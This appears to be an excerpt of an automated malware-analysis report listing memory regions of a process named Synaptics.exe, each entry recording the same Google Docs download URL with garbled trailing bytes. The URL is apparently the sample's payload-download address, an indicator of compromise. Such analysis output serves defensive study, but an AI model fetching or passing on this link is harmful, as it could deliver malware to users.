                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download00
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0a
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0d
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0j
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1/L.
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1SO
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1n
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000051D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.000000000059F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2PB
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2ls-
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2m
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2o
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3lssI
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4.I-%
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4e
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4~
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5VK-%
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1828505760.000000000D9BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6WN.
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000003.1439557060.000000000538B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7M
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7jv/rN
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7m
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8c
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8j
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9.D-$
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9RG)n
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9Z
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:$L-
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:/
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:_
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:n
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;WE.;
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;work1ot
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=k
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=ns-
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA-
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAY
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAk
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAn
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBV
                              Source: Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBm
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBsn
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC5aEUzj;/iG
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCalif
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCl
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDa
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDj
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE/
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadES
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEn
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd/
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddS
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadde
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddel=
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddn
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd~
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade-
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.R
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.co
                              Source: Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.com&nf-u
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadefral
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadek6
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadel
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadep
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeport
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadersio
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfT
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadflights-cn.net
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgj
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
